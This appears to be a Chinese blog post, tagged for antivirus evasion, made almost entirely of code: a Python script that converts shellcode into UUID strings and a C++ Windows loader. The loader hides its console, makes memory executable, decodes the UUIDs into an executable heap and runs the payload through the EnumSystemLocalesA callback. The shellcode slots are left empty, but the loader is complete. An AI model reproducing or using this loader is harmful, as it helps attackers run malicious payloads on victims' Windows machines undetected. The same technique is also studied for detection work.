生成UUID的Python脚本:
import uuid
shellcode=b""
list = []
for i in range(50):
bytes_a = shellcode[i * 16: 16 + i * 16]
b = uuid.UUID(bytes_le=bytes_a)
list.append(str(b))
with open("shellcode.c","w",encoding="utf-8") as f:
f.write("const char* uuids[] ={")
for UUID in list:
f.write("\""+UUID+"\""+",")
f.write("};")
print(list)
加载器:
#include <iostream>
#include <windows.h>
#include<Rpc.h>
#pragma comment(lib,"Rpcrt4.lib")
using namespace std;
// data段可读写
#pragma comment(linker, "/section:.data,RWE")
// 不显示窗口
// 隐藏启动控制台
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#pragma comment(linker, "/INCREMENTAL:NO")
int main()
{
const char* uuids[] = {"",""}
HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);//获得可执行的句柄
void* ha = HeapAlloc(hc, 0, 0x100000);//申请堆空间
if (ha == NULL)
{
cout << "内存申请失败!" << endl;
return 0;
}
DWORD_PTR hptr = (DWORD_PTR)ha;
int elems = sizeof(uuids) / sizeof(uuids[0]);//获得需要写入uuids数组元素个数
for (int i = 0; i < elems; i++)
{
RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)hptr);//写入shellcode
if (status != RPC_S_OK)//判断是否写入正常
{
cout << "UuidFromeStringA()!=S_OK" << endl;
CloseHandle(ha);
return -1;
}
hptr += 16;
}
EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0);//回调函数,运行shellcode
CloseHandle(ha);
return 0;
}标签:comment,函数,linker,list,UUID,pragma,免杀 From: https://www.cnblogs.com/wuruixin/p/17016826.html